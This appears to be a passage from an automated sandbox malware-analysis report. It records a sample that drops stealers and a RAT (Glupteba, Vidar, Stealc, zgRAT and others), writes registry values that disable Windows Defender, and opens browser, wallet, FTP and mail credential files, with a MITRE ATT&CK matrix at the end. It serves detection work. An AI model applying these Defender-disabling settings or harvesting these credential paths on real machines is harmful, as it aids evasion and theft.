                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: EnumSystemLocalesW,19_2_05CF7358
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetLocaleInfoW,19_2_05D00B35
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_05D002CA
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_05D00A2E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,21_2_00420063
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetLocaleInfoW,21_2_004208CE
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: EnumSystemLocalesW,21_2_004170F1
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_0042099B
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: EnumSystemLocalesW,21_2_004202DB
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: EnumSystemLocalesW,21_2_00420326
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: EnumSystemLocalesW,21_2_004203C1
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,21_2_0042044E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetLocaleInfoW,21_2_004174E4
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetLocaleInfoW,21_2_0042069E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_004207C7
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_041E0C02
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: EnumSystemLocalesW,21_2_041E0542
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: EnumSystemLocalesW,21_2_041E058D
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: EnumSystemLocalesW,21_2_041E0628
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetLocaleInfoW,21_2_041D774B
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetLocaleInfoW,21_2_041E0905
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetLocaleInfoW,21_2_041E0903
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_041E0A2E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,21_2_041E02CA
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: GetLocaleInfoW,21_2_041E0B35
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: EnumSystemLocalesW,21_2_041D7358
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ff086fda VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\u4dc.0.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63862B180 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF63862B180
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Disable Windows Defender real time protection (registry)
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\ExclusionsRegistry value created: Exclusions_Extensions 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiSpyware 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableRoutinelyTakingAction 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableBehaviorMonitoring 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableOnAccessProtection 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableScanOnRealtimeEnable 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRawWriteNotification 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiSpyware 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableRoutinelyTakingAction 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\ExclusionsRegistry value created: Exclusions_Extensions 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableBehaviorMonitoring 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableOnAccessProtection 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableScanOnRealtimeEnable 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                        Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRawWriteNotification 1
                        Exclude list of file types from scheduled, custom, and real-time scanning
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeRegistry value created: Exclusions_Extensions 1
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeRegistry value created: Exclusions_Extensions 1
                        Modifies Group Policy settings
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile written: C:\Windows\System32\GroupPolicy\gpt.ini
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1495305940.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.1.PA8JWMmRYiQsN7iqTjOvjsbW.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.1.zUOgRazdYnb35XHU4UIsV9Yc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 43.1.OYqxk9G3x4R05N4I0KLZXbXg.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.1.68bEfZA6FBu6lC5BaADYSIdx.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PA8JWMmRYiQsN7iqTjOvjsbW.exe PID: 8176, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: zUOgRazdYnb35XHU4UIsV9Yc.exe PID: 7204, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 0FR80IiNvxJZyXnpOgiDlYNV.exe PID: 4252, type: MEMORYSTR
                        Yara detected Mars stealer
                        Source: Yara matchFile source: 10.3.u5v8.0.exe.4200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.u69w.0.exe.41d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.u4dc.0.exe.41e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.u5v8.0.exe.4200000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.u69w.0.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.u4dc.0.exe.41e0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPED
                        Yara detected Stealc
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 10.3.u5v8.0.exe.4200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.u69w.0.exe.41d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.u4dc.0.exe.41e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.u5v8.0.exe.4200000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.u69w.0.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.u4dc.0.exe.41e0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Yara detected zgRAT
                        Source: Yara matchFile source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPED
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-shm
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-wal
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-shm
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-wal
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

                        Remote Access Functionality

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.1.PA8JWMmRYiQsN7iqTjOvjsbW.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.1.zUOgRazdYnb35XHU4UIsV9Yc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 43.1.OYqxk9G3x4R05N4I0KLZXbXg.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.1.68bEfZA6FBu6lC5BaADYSIdx.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PA8JWMmRYiQsN7iqTjOvjsbW.exe PID: 8176, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: zUOgRazdYnb35XHU4UIsV9Yc.exe PID: 7204, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 0FR80IiNvxJZyXnpOgiDlYNV.exe PID: 4252, type: MEMORYSTR
                        Yara detected Mars stealer
                        Source: Yara matchFile source: 10.3.u5v8.0.exe.4200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.u69w.0.exe.41d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.u4dc.0.exe.41e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.u5v8.0.exe.4200000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.u69w.0.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.u4dc.0.exe.41e0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPED
                        Yara detected Stealc
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 10.3.u5v8.0.exe.4200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.u69w.0.exe.41d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.u4dc.0.exe.41e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.u5v8.0.exe.4200000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.u69w.0.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.u4dc.0.exe.41e0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Yara detected zgRAT
                        Source: Yara matchFile source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information11
                        Scripting                        		Valid Accounts2
                        Windows Management Instrumentation                        		11
                        Scripting                        		1
                        Abuse Elevation Control Mechanism                        		51
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		1
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Shared Modules                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        Credential API Hooking                        		4
                        File and Directory Discovery                        		Remote Desktop Protocol3
                        Data from Local System                        		1
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		1
                        Windows Service                        		1
                        Bypass User Account Control                        		1
                        Abuse Elevation Control Mechanism                        		Security Account Manager177
                        System Information Discovery                        		SMB/Windows Admin Shares1
                        Email Collection                        		1
                        Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts11
                        Scheduled Task/Job                        		11
                        Scheduled Task/Job                        		1
                        Access Token Manipulation                        		2
                        Obfuscated Files or Information                        		NTDS1
                        Query Registry                        		Distributed Component Object Model1
                        Credential API Hooking                        		1
                        Proxy                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts1
                        PowerShell                        		2
                        Registry Run Keys / Startup Folder                        		1
                        Windows Service                        		1
